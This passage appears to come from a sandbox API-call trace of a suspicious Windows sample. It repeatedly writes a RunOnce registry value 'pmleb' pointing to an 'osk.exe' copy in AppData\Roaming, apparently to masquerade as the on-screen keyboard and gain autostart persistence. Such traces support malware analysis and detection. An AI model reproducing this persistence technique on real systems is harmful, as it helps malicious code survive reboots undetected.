pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.454] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.454] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.454] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.454] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.454] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.454] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.455] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x37 [0081.455] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.455] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x38 [0081.455] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.456] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x37 [0081.456] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.456] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.456] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.456] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.456] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.456] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.456] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.456] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.457] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.457] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.457] RegCloseKey (hKey=0x280) returned 0x0 [0081.457] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.457] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.457] SetTimer (hWnd=0x20280, nIDEvent=0x20b3, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b3 [0081.457] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.469] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.469] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.469] KillTimer (hWnd=0x20280, uIDEvent=0x20b3) returned 1 [0081.469] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.469] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.469] IUnknown:Release (This=0x787518) returned 0x1 [0081.470] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.470] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.470] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.470] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.470] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.470] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.470] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.470] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.470] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.470] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x38 [0081.470] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.470] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x39 [0081.471] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.471] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x38 [0081.472] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.472] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.472] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.472] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.472] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.472] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.472] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.472] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.472] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.472] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.473] RegCloseKey (hKey=0x280) returned 0x0 [0081.473] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.473] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.473] SetTimer (hWnd=0x20280, nIDEvent=0x20b4, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b4 [0081.473] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.485] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.485] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.485] KillTimer (hWnd=0x20280, uIDEvent=0x20b4) returned 1 [0081.485] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.485] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.485] IUnknown:Release (This=0x787518) returned 0x1 [0081.485] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.486] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.486] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.486] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.486] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.486] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.486] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.486] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.486] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.486] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x39 [0081.486] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.486] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x3a [0081.486] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.487] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x39 [0081.487] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.487] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.487] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.488] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.488] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.488] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.488] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.488] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.488] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.488] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.488] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.488] RegCloseKey (hKey=0x280) returned 0x0 [0081.488] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.489] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.489] SetTimer (hWnd=0x20280, nIDEvent=0x20b5, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b5 [0081.489] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.500] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.500] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.500] KillTimer (hWnd=0x20280, uIDEvent=0x20b5) returned 1 [0081.500] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.501] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.501] IUnknown:Release (This=0x787518) returned 0x1 [0081.501] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", 